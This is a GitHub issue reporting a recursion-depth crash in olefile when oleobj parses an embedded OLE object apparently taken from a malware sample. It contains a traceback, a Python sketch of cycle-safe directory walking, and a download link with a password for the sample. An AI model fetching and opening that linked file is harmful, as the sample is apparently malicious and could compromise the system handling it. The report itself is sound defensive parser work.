Recursion Error in olefile #311

Open
malware-kitten opened this issue May 14, 2018 · 1 comment

@malware-kitten

I think that this is a case where recursion is running further than intended... An object is 0xc00 in length and recursion limits are being hit.

The full contents of the equation object are


When running oleobj against the embedded object the following error is hit.

oleobj 0.52.4 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

-------------------------------------------------------------------------------
File: './068856a2a048786109fd825130f29bf1_object_00018402.bin'
ERROR    Caught exception opening ./068856a2a048786109fd825130f29bf1_object_00018402.bin
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/oletools/oleobj.py", line 629, in find_ole
    ole = olefile.OleFileIO(arg_for_ole)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1211, in __init__
    self.open(filename, write_mode=write_mode)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1479, in open
    self.loaddirectory(self.first_dir_sector)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1844, in loaddirectory
    self.root.build_storage_tree()
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1021, in build_storage_tree
    self.append_kids(self.sid_child)
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1074, in append_kids
... Output snipped ...
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1052, in append_kids
    child = self.olefile._load_direntry(child_sid) #direntries[child_sid]
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1864, in _load_direntry
    "double reference for OLE stream/storage")
  File "/usr/local/lib/python2.7/dist-packages/oletools/thirdparty/olefile/olefile.py", line 1237, in _raise_defect
    log.warning(message)
  File "/usr/lib/python2.7/logging/__init__.py", line 1178, in warning
    if self.isEnabledFor(WARNING):
RuntimeError: maximum recursion depth exceeded

Even though oleobj shouldn't produce any real output in this scenario, it seems to me that a recursion bug exists and should be handled by olefile.

The following object can be downloaded here -> https://drive.google.com/open?id=1EHrNlgSDr6NH7qMLS5vFh309IVwigCTZ
password: oletools
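
The traceback above shows `append_kids` recursing while `_load_direntry` reports "double reference for OLE stream/storage" only as a logged warning. As an added example (not olefile's or oletools' own code), the sketch below walks a compound-file directory iteratively and never follows an entry ID twice, so a cyclic directory ends with a recorded defect instead of exhausting the stack. `make_entry`, `parse_entries`, `walk_directory` and the `SAMPLE` directory are hypothetical names and constructed data; the field offsets (0x40 name length, 0x44/0x48/0x4C left/right/child) follow the compound file directory entry layout.

```python
import struct

NOSTREAM = 0xFFFFFFFF  # CFB marker for "no sibling / no child"
ENTRY_SIZE = 128       # one directory entry

def make_entry(name, left, right, child):
    """Build one constructed 128-byte directory entry (sample data only)."""
    encoded = (name + "\0").encode("utf-16-le")
    raw = bytearray(ENTRY_SIZE)
    raw[:len(encoded)] = encoded
    struct.pack_into("<H", raw, 0x40, len(encoded))          # name length
    struct.pack_into("<III", raw, 0x44, left, right, child)  # tree links
    return bytes(raw)

def parse_entries(directory):
    """Return [(name, left_sid, right_sid, child_sid), ...] from raw bytes."""
    entries = []
    for off in range(0, len(directory) - ENTRY_SIZE + 1, ENTRY_SIZE):
        (name_len,) = struct.unpack_from("<H", directory, off + 0x40)
        links = struct.unpack_from("<III", directory, off + 0x44)
        raw_name = directory[off:off + max(min(name_len, 64) - 2, 0)]
        entries.append((raw_name.decode("utf-16-le", "replace"),) + links)
    return entries

def walk_directory(entries):
    """Iteratively visit entries reachable from sid 0; never follow a sid twice."""
    visited, order, defects = set(), [], []
    stack = [(0, "root")]
    while stack:
        sid, via = stack.pop()
        if sid == NOSTREAM:
            continue
        if sid >= len(entries) or sid in visited:
            why = "referenced twice" if sid in visited else "out of range"
            defects.append("sid %d (%s) %s" % (sid, via, why))
            continue
        visited.add(sid)
        order.append(sid)
        _, left, right, child = entries[sid]
        for ref, kind in ((child, "child"), (right, "right"), (left, "left")):
            stack.append((ref, "%s of %d" % (kind, sid)))
    return order, defects

# Constructed sample: entry 3's right-sibling link points back at the root.
SAMPLE = b"".join([
    make_entry("Root Entry", NOSTREAM, NOSTREAM, 1),
    make_entry("A", NOSTREAM, 2, NOSTREAM),
    make_entry("B", NOSTREAM, 3, NOSTREAM),
    make_entry("C", NOSTREAM, 0, NOSTREAM),
])
```

Calling `walk_directory(parse_entries(SAMPLE))` visits each of the four entries once and reports the back-reference to sid 0 as a defect; the work is bounded by the number of directory entries regardless of how the links are arranged.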

@decalage2 decalage2 self-assigned this May 14, 2018
@decalage2 decalage2 added this to the oletools 0.5x milestone May 14, 2018
@enkelli
Contributor

enkelli commented May 27, 2018

Probably similar to this olefile repo PR
